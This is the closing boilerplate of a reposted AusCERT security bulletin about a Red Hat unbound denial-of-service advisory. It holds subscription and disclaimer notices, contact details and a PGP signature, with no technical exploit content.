You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBX30RsONLKJtyKPYoAQh2iRAAnxfVTOy/2aDOgd9URAO9jACPGk2icanw
OgSPNodIGEyU5YxjZsxE6Q+iIsgNg1P+qQfaTAd069Nj4r7Coifpp4P1G4CNqK2V
iM1Ip1QQjqL17XH8rdubkpt2IU+Ygsj2vjY08zL2BSjJqiEqZtuLTV/PG063aK+9
Bf8RT4tclSzju2iYb4p4pfMQQs3nsvic+mh3xKaSCyoOh6IGE0LCqWZH2J98CLtV
sbbfXi82q25TlfSONj1s4wjc+ZEoDD9uJk0v///WHHM2iYZL80H1Db1IxYqpiMK7
yRJ9CFyfYV97cB0mJMh10rXy3AvQpxkLmOaS588hXGDAdj7t68sOSc3w38+RUHNC
wSZ6Mnh/Z82TssrUsHDQ5MlF5Wt+qaFyzW/fRLiH39YKEDp8u4G70C5nqQo7Oegs
dDWCvXOoXmJ8FT/u8UqFoY+1/MtIxhZwK3nIqFrWHvCowx2ZD1y3rBuryMCgNOwQ
ek7fqVAcZLyKA/WRO/DKNP3UlQwmqO//+ETo9kIJhIRRyYTk7gtANT+Tv97uVusI
NlJEefvWEaxCTM7+L9UKw/Mtt7VYEo1SyD0nd21UXtyElidNJTX3jqP/t4avnWuA
bJ45nbMaaZXayoxVSQjrpO/ZzMnBMfGRhyVcKNooDFxkVuo6froi1w64ObPiH0Ck
syxnf1y+0k8=
=qvs1
-----END PGP SIGNATURE-----

Read More

The post ESB-2020.3460 – [RedHat] unbound: Denial of service – Remote/unauthenticated appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/esb-2020-3460-redhat-unbound-denial-of-service-remote-unauthenticated/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2020-3460-redhat-unbound-denial-of-service-remote-unauthenticated